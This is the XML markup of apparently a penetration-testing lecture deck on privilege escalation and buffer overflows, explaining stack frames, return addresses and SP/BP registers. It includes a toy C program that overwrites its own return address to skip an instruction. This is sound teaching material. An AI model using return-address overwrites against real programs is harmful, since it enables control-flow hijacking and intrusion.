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3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7" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="279" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="278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20" y="-7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AFE342-C296-1B41-906F-8E94FE4CEF6D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18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2F4958-0963-164B-8EBA-C20FE7BBAB5C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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C77EDB-384C-0447-BA3A-2451234A7756}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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22884A-37A7-D240-9018-F96F411F515B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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93789A1-3150-A042-814D-0C4C4711BC79}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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F9D69C-55FC-744A-AF77-6BD616210639}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>23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8980A4-749C-DF4F-A458-63571A493C44}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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479C15-3AC4-6848-844B-11252A16768A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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C08371-52C7-0C4C-8C30-65527D0FEC88}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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7E945F-7B82-594B-A437-59F6CBA544FE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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C8ABA6-F15A-AF4B-9EB0-6754C6DFA5FF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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DAD3AE-A688-8847-84D5-5E021CD1C924}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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3B587E-A0F0-AB46-B899-368F91634F91}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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F1DEA9-7074-4846-A6DD-C37911546165}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>31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buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{04D7CE5F-AD6B-3541-95E6-68B854A3E645}" type="slidenum">
              <a:rPr lang="en-US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31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Text Box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Introduction to Penetration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 Elevating privileges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Getting code run in a privileged context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Exploiting misconfigurations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File permissions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Attacking services and applications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Buffer overflows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What Does This Program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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdio.h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void f()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char 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[4];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*ret;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ret = (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*) (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 + 8);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(*ret) += 7;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main()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x=0;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f();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x=1;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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("x=%d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n",x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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}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cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>The Stack Segment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charset="0"/>
              </a:rPr>
              <a:t>A program’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>stack segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>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Temporary working space for the program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Example: Subroutines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foo(</a:t>
            </a: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P1, </a:t>
            </a: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P2) /* subroutine “foo”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L1, L2; /* local variables L1 and L2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L1 = P1 + P2;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return(L1); /* return value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 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main() /* main program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x = foo(1,2); /* call to subroutine “foo” */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375"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15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Stack 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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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3505200" y="1905000"/>
            <a:ext cx="4084638" cy="4360863"/>
            <a:chOff x="2208" y="1200"/>
            <a:chExt cx="2573" cy="2747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2270" y="3659"/>
              <a:ext cx="12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Stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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2208" y="2414"/>
              <a:ext cx="1368" cy="1213"/>
              <a:chOff x="2208" y="2414"/>
              <a:chExt cx="1368" cy="1213"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="Rectangle 6"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="2414"/>
                <a:ext cx="1368" cy="121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Text Box 7"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2535" y="2928"/>
                <a:ext cx="714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1500"/>
                  </a:spcBef>
                  <a:buClr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main</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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2208" y="1200"/>
              <a:ext cx="1368" cy="1213"/>
              <a:chOff x="2208" y="1200"/>
              <a:chExt cx="1368" cy="1213"/>
            </a:xfrm>
          </p:grpSpPr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2208" y="1200"/>
                <a:ext cx="1368" cy="1213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Text Box 10"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2535" y="1714"/>
                <a:ext cx="714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1500"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>foo</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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169" y="2196"/>
              <a:ext cx="61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1250"/>
                </a:spcBef>
                <a:buClrTx/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Stack frames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 flipV="1">
              <a:off x="3606" y="2007"/>
              <a:ext cx="565" cy="347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>
              <a:off x="3606" y="2352"/>
              <a:ext cx="565" cy="372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14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="1981200"/>
            <a:ext cx="2208213" cy="3735388"/>
            <a:chOff x="816" y="1248"/>
            <a:chExt cx="1391" cy="2353"/>
          </a:xfrm>
        </p:grpSpPr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816" y="1248"/>
              <a:ext cx="1391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en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Low </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Addresses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1344" y="1584"/>
              <a:ext cx="0" cy="1727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17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="816" y="3312"/>
              <a:ext cx="139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en-US">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>High 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Stack Frames (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cont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charset="0"/>
              </a:rPr>
              <a:t>A stack frame contains the corresponding routine’s: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Parameters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Return address (i.e. next instruction to execute upon completion)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Saved registers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Local variables</a:t>
            </a:r>
          </a:p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Many architectures have registers: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SP, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>stack pointer</a:t>
            </a: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, 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points to the top of the stack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BP, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>base pointer</a:t>
            </a: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, points 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to a fixed location within the frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="45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  <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Used to reference the procedure’s parameters and local variables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial Unicode MS" charset="0"/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Stack Frames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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> routine calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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’s parameters are first pushed onto the stack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The next instruction in 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main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 to execute after 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 finishes, the return address, is pushed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Control is transferred to </a:t>
            </a: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Arial Unicode MS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Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>’s prologue:</a:t>
            </a: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Save caller’s  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman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’s) base pointer</a:t>
            </a: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Set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callee’s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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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’s) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman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equal to the current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>sp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRP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Increment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>sp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to reserve space on the stack for foo’s local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vars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(word aligned)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’s instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>’s epilogue:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Restore saved values and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deallocate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cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>callee’s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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>’s) stack frame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Stack Frame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500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pP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foo(</a:t>
            </a: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P1, </a:t>
            </a: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P2) /* subroutine “foo”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</a:t>
            </a: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L1, L2; /* local variables L1 and L2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L1 = P1 + P2;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return(L1); /* return value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 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 err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a: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main() /* main program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{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x = foo(1,2); /* call to subroutine “foo” */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    …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin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3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Stack Frames – Example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75"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>’s stack frame after the completion of the prologue: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5056188" y="2362200"/>
            <a:ext cx="1052512" cy="366713"/>
            <a:chOff x="3185" y="1488"/>
            <a:chExt cx="663" cy="231"/>
          </a:xfrm>
        </p:grpSpPr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3475" y="1488"/>
              <a:ext cx="3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SP</a:t>
              </a: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3184" y="1574"/>
              <a:ext cx="322" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line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7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="3048000"/>
            <a:ext cx="1460500" cy="546100"/>
            <a:chOff x="2208" y="1920"/>
            <a:chExt cx="920" cy="344"/>
          </a:xfrm>
        </p:grpSpPr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208" y="1920"/>
              <a:ext cx="920" cy="344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2266" y="2024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L1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 10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17" name="Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2498725"/>
            <a:ext cx="1460500" cy="547688"/>
            <a:chOff x="2208" y="1574"/>
            <a:chExt cx="920" cy="345"/>
          </a:xfrm>
        </p:grpSpPr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208" y="1574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2266" y="1678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L2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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3505200" y="4692650"/>
            <a:ext cx="1460500" cy="547688"/>
            <a:chOff x="2208" y="2956"/>
            <a:chExt cx="920" cy="345"/>
          </a:xfrm>
        </p:grpSpPr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2208" y="2956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2266" y="3061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P1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="5241925"/>
            <a:ext cx="1460500" cy="546100"/>
            <a:chOff x="2208" y="3302"/>
            <a:chExt cx="920" cy="344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2208" y="3302"/>
              <a:ext cx="920" cy="344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2266" y="3405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P2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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5516563" y="3459163"/>
            <a:ext cx="11890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Foo’s BP</a:t>
            </a:r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 flipH="1">
            <a:off x="5054600" y="3595688"/>
            <a:ext cx="512763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" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="2590800"/>
            <a:ext cx="2208213" cy="3186113"/>
            <a:chOff x="720" y="1632"/>
            <a:chExt cx="1391" cy="2007"/>
          </a:xfrm>
        </p:grpSpPr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720" y="1632"/>
              <a:ext cx="13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Low Addresses</a:t>
              </a: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>
              <a:off x="1416" y="1968"/>
              <a:ext cx="0" cy="1343"/>
            </a:xfrm>
            <a:prstGeom prst="line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 Box 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="720" y="3408"/>
              <a:ext cx="13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High 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Ex1.c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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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void f()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char 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[4];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*ret;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ret = (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*) (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + 8);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(*ret) += 7;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ts val="400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pP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main() {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x=0;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f();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x=1; // This instruction is not being executed. Why?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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("x=%d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n",x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pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>The Stack as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>() Begins Execution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3505200" y="1828800"/>
            <a:ext cx="1460500" cy="547688"/>
            <a:chOff x="2208" y="1152"/>
            <a:chExt cx="920" cy="345"/>
          </a:xfrm>
        </p:grpSpPr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2208" y="115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Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2266" y="125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ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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3505200" y="4687888"/>
            <a:ext cx="1460500" cy="1139825"/>
            <a:chOff x="2208" y="2953"/>
            <a:chExt cx="920" cy="718"/>
          </a:xfrm>
        </p:grpSpPr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2208" y="2953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Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2266" y="317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247900" y="2286000"/>
            <a:ext cx="1588" cy="29718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0498" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2376488"/>
            <a:ext cx="1460500" cy="1219200"/>
            <a:chOff x="2208" y="1497"/>
            <a:chExt cx="920" cy="768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20499" name="Group 19"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="2073"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="2073"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20500" name="Rectangle 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="2073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Text Box 21"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="2073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buf[3]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20502" name="Group 22"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="1881"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="1881"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20503" name="Rectangle 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="1881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4" name="Text Box 24"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="1881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buf[2]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20505" name="Group 25"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="1689"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="1689"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20506" name="Rectangle 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="1689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27"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="1689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buf[1]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20508" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="1497"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="1497"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20509" name="Rectangle 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="1497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0" name="Text Box 30"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="1497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buf[0]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grp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5029200" y="4191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5029200" y="3657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0292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5029200" y="2362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029200" y="2667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5029200" y="2971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5029200" y="3276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9880574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100" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> points to the the return address on the stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret = (int *) (buf + 8);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3505200" y="1828800"/>
            <a:ext cx="1460500" cy="547688"/>
            <a:chOff x="2208" y="1152"/>
            <a:chExt cx="920" cy="345"/>
          </a:xfrm>
        </p:grpSpPr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2208" y="115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Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2266" y="125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ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21514" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
